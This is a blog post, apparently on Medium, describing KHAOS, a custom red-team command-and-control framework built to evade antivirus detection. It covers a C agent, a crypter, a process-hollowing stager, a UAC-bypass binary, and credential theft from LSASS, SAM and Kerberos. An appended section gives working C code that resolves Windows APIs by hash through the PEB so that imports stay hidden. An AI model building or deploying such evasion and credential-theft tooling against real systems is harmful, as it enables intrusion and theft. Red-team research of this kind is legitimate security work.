KHAOS C2: Building a Fully Custom Command and Control from Scratch | by Ilyes AZIZ | Jun, 2026 | Medium
17 min read
Every red team engagement starts the same way. You set up your infrastructure, stage your payload, and within minutes Defender flags it. You swap to Havoc. Same result. You try Sliver, tweak the profile, recompile. Flagged again. The problem is not the framework. The problem is that the moment a tool gets popular, it becomes a signature. Security vendors monitor open-source repositories, pull every release, feed the binaries into their detection pipelines, and ship updates. By the time you are using a public C2, it is already a known quantity. Cobalt Strike costs $3,000 a year and its indicators are in every public YARA ruleset. Havoc and Sliver are flagged out of the box. The problem is not the features. It is the fingerprint.

The answer is not finding a better public framework. It is building your own.

KHAOS is a full-stack C2 framework built from scratch: no borrowed loader, no reused beacon, no dependency on a runtime that carries a recognizable fingerprint. Every component is custom: a Windows agent written in pure C, a dedicated crypter for delivery, a stager that handles in-memory decryption and injection, a separate UAC elevator called the lifter, a Python server, and a web interface built in React. Each component was designed and implemented independently, and each can be understood, modified, and replaced without touching anything else.

The stack
Interface

The operator interface is a web application built in React. It connects to the Python server over WebSocket, displays active agents, manages tasks, and surfaces collected data: screenshots, harvested credentials, file transfers, session logs. Access it from any browser pointed at the server. The UI is purely operational: it reflects what the server knows about active agents and gives the operator a way to interact with them without touching a terminal. A Tauri wrapper is also available for operators who prefer a standalone desktop application over a browser tab.

The server is a Python application built on FastAPI. It handles agent authentication, beacon parsing, task queuing, and data storage. It also exposes a build endpoint that compiles agent payloads on demand with freshly generated cryptographic parameters, so each payload delivered to a target is unique at the byte level. Byte-level uniqueness defeats hash-based and static signature matching; it does not by itself hide what the loader does once it runs. The server can run on a VPS, behind a redirector, or on the operator's own machine during a local engagement.

The agent is the core of everything. It is written in pure C with no external library dependencies beyond the Windows API: no C++ runtime, no Rust standard library, no framework code that would leave a recognizable pattern in the binary. The import table is deliberately sparse: sensitive API calls are resolved at runtime by walking the PEB loader list to locate the module and then its export table, rather than being declared as imports. The agent handles communication, command execution, and all post-exploitation logic within a single binary designed from the ground up to leave as small a footprint as possible.

The crypter and stager handle delivery. The crypter encodes the compiled agent and wraps it in a loader that performs environment checks before doing anything else. The stager decrypts the payload in memory and injects it into a target process via process hollowing. The lifter is a standalone binary responsible for UAC bypass and privilege elevation. It exists separately from the agent on purpose: it does one thing, exits, and can be replaced independently if a bypass technique gets patched.

What the agent does
Features

This is not a minimal beacon with a shell command attached. The agent covers the full post-exploitation surface that an engagement actually requires, and it does so without relying on external tooling dropped to disk.

On the post-exploitation side, operators get interactive shell execution, process enumeration, screenshot capture, file system management including upload and download, registry read and write, and WMI query execution. These are the basics, but they are implemented cleanly, without the overhead of a .NET runtime or a Python interpreter running inside the target process.

Credential access goes deeper. The agent can dump LSASS memory, extract SAM hashes, harvest Kerberos tickets, and enumerate stored credentials through the Windows Credential Manager API. Each of these runs in memory through dynamically resolved APIs, with no auxiliary tool dropped to disk.

Lateral movement support includes an integrated port scanner, a SOCKS5 proxy, reverse port forwarding, and SMB relay. The SOCKS5 proxy lets operators route arbitrary tooling through a compromised host without staging anything...
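Both the stack section (the agent's sparse import table, resolved through the PEB) and the credential-access paragraph above (everything running through "dynamically resolved APIs") rest on the same mechanism. The following is an added example in the agent's language, C, and is not KHAOS code: it shows hash-based export resolution end to end. The agent carries only a 32-bit hash of each API name, walks the PEB loader list to find the module base (Windows-only, guarded by `#ifdef _WIN32`), then parses that module's export directory and compares hashes instead of strings. The ROR-13 hash, the function names, and the constructed PE32+ image with two fake exports are all assumptions made so the parser can be exercised on any OS; on Windows you would pass the base returned by `module_base_by_hash` to `resolve_export_rva` instead.

```c
/* Added example (not KHAOS code): hash-based export resolution, the technique
   behind a sparse import table. Only name hashes live in the binary; the agent
   finds the module via the PEB (Windows-only block below), then walks its
   export directory. The parser is portable and runs here on a constructed image. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IMAGE_SIZE 0x2000

/* PE fields are little-endian regardless of host; read and write them explicitly. */
static uint32_t rd32(const uint8_t *p) { return p[0] | (p[1] << 8) | (p[2] << 16) | ((uint32_t)p[3] << 24); }
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static void wr32(uint8_t *p, uint32_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }

/* ROR-13 additive hash (an assumed choice; build step and agent just have to agree).
   Case-sensitive, so hash "VirtualAlloc" exactly as the export table spells it. */
uint32_t api_hash(const char *name) {
    uint32_t h = 0;
    for (; *name; name++) {
        h = (h >> 13) | (h << 19);
        h += (uint8_t)*name;
    }
    return h;
}

/* Walk a mapped module's export directory; return the RVA of the export whose
   name hashes to `wanted`, or 0 if none does. Add `base` to get the address. */
uint32_t resolve_export_rva(const uint8_t *base, uint32_t wanted) {
    uint32_t nt = rd32(base + 0x3C);                        /* IMAGE_DOS_HEADER.e_lfanew */
    if (rd32(base + nt) != 0x00004550) return 0;            /* "PE\0\0" */
    uint32_t opt = nt + 24;                                 /* OptionalHeader follows the 20-byte FileHeader */
    uint32_t dd = (rd16(base + opt) == 0x20B) ? 112 : 96;   /* DataDirectory offset: PE32+ vs PE32 */
    uint32_t exp = rd32(base + opt + dd);                   /* DataDirectory[EXPORT].VirtualAddress */
    if (!exp) return 0;
    uint32_t n_names = rd32(base + exp + 24), funcs = rd32(base + exp + 28);
    uint32_t names = rd32(base + exp + 32), ords = rd32(base + exp + 36);
    for (uint32_t i = 0; i < n_names; i++) {
        const char *name = (const char *)base + rd32(base + names + 4 * i);
        if (api_hash(name) == wanted)
            return rd32(base + funcs + 4 * rd16(base + ords + 2 * i));   /* ordinal indexes AddressOfFunctions */
    }
    return 0;
}

#ifdef _WIN32
#include <windows.h>
#include <winternl.h>
/* Windows x64 only: locate a module base without GetModuleHandle by walking
   PEB->Ldr->InMemoryOrderModuleList and hashing each upper-cased file name
   (e.g. api_hash("KERNEL32.DLL")). The PEB sits at gs:[0x60] on x64. */
void *module_base_by_hash(uint32_t wanted) {
    PEB *peb = (PEB *)__readgsqword(0x60);
    LIST_ENTRY *head = &peb->Ldr->InMemoryOrderModuleList;
    for (LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) {
        LDR_DATA_TABLE_ENTRY *m = CONTAINING_RECORD(e, LDR_DATA_TABLE_ENTRY, InMemoryOrderLinks);
        WCHAR *w = m->FullDllName.Buffer;
        int len = m->FullDllName.Length / 2, start = 0, n = 0;
        char name[64];
        for (int i = 0; i < len; i++) if (w[i] == L'\\') start = i + 1;   /* keep file name only */
        for (int i = start; i < len && n < 63; i++)
            name[n++] = (char)((w[i] >= L'a' && w[i] <= L'z') ? w[i] - 32 : w[i]);
        name[n] = 0;
        if (api_hash(name) == wanted) return m->DllBase;
    }
    return NULL;
}
#endif

/* Constructed test double: a minimal PE32+ image exporting two names, so the
   parser can run on any OS. Layout: NT headers at 0x80, export directory at 0x1000. */
void build_fake_module(uint8_t *img) {
    const char *names[2] = { "CreateThread", "VirtualAlloc" };   /* sorted, as a linker emits them */
    uint32_t rvas[2] = { 0x1B00, 0x1A00 };                        /* pretend code RVAs */
    uint32_t nt = 0x80, exp = 0x1000, funcs = exp + 40, ords = funcs + 8, ptrs = ords + 4, strs = ptrs + 8;
    memset(img, 0, IMAGE_SIZE);
    img[0] = 'M'; img[1] = 'Z';
    wr32(img + 0x3C, nt);
    wr32(img + nt, 0x00004550);
    wr16(img + nt + 24, 0x20B);                                   /* PE32+ optional header */
    wr32(img + nt + 24 + 112, exp); wr32(img + nt + 24 + 116, 0x100);
    wr32(img + exp + 20, 2); wr32(img + exp + 24, 2);             /* NumberOfFunctions, NumberOfNames */
    wr32(img + exp + 28, funcs); wr32(img + exp + 32, ptrs); wr32(img + exp + 36, ords);
    for (uint32_t i = 0; i < 2; i++) {
        wr32(img + funcs + 4 * i, rvas[i]);
        wr16(img + ords + 2 * i, (uint16_t)i);
        wr32(img + ptrs + 4 * i, strs);
        strcpy((char *)img + strs, names[i]);
        strs += (uint32_t)strlen(names[i]) + 1;
    }
}

/* Resolve `name` against the constructed module. The name is hashed here only
   for the demo; a real agent ships the precomputed constants, never the strings. */
uint32_t demo_resolve(const char *name) {
    static uint8_t img[IMAGE_SIZE];
    build_fake_module(img);
    return resolve_export_rva(img, api_hash(name));
}

int main(void) {
    printf("VirtualAlloc -> RVA 0x%X\n", demo_resolve("VirtualAlloc"));
    printf("CreateThread -> RVA 0x%X\n", demo_resolve("CreateThread"));
    printf("NoSuchExport -> RVA 0x%X\n", demo_resolve("NoSuchExport"));
    return 0;
}
```

Two things to check before relying on this in an agent: the hash must be computed over the exact case the export table uses (module names in the PEB are hashed upper-cased above, export names are not), and forwarded exports (an RVA that points back inside the export directory) are not handled here, so resolving something like `HeapAlloc` on some Windows builds needs a second hop that this example leaves out.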